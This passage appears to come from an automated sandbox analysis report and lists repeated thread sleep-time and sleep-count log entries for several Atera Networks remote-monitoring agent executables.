                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599340s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599227s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599080s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598834s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598605s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598474s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598352s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598241s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598124s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598016s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597906s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597687s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597571s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597455s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597328s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597219s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -597109s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596998s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596891s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596781s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596672s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596562s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596450s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -596343s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7544Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 2356Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep count: 45 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -41505174165846465s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7552Thread sleep count: 7251 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -599553s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -599431s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -599328s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -599211s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -599099s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598970s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598828s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598702s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7552Thread sleep count: 2566 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598592s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598469s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598238s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598124s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -598015s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597890s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597758s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597625s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597488s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597371s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597265s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597156s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -597046s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596933s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596828s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596714s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596606s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596472s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596358s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596249s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596140s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -596030s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595922s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595812s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595703s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595593s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595473s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595250s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595128s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -595015s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594906s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594687s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594577s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594468s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594250s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594140s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -594031s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -593922s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -593810s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7468Thread sleep time: -593703s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7684Thread sleep count: 1638 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7976Thread sleep time: -7378697629483816s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7976Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7520Thread sleep count: 2503 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7656Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6276Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8000Thread sleep count: 298 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8000Thread sleep count: 1323 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7600Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4072Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 6632Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 8100Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 6488Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 8072Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 5868Thread sleep count: 7309 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep count: 37 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -34126476536362649s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -599546s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -599218s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -598859s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -598500s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -598338s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -598191s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -597984s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -597845s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -597640s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -597509s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -597390s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -597220s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -597078s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -596921s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -596750s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -596443s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -596234s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -596046s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -595671s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -595527s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -595377s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -595244s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -595117s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -594998s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -594853s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -594687s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -594505s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -594343s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -594201s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -594074s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -593953s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -593796s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -593640s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -593520s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -593398s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -593262s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -593138s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -593024s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -592890s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -592718s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -592608s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -592499s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -592373s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -592252s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6684Thread sleep count: 2259 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -592121s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -592002s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -591884s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -591755s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -591625s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -591515s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -591406s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -591291s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -591187s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -591077s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -590968s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -590859s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -590749s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -590629s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -590512s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -590406s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -590296s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -590187s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -590078s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -589957s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -589808s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -589692s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -589328s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -588703s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -588557s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 6096Thread sleep time: -588437s >= -30000s
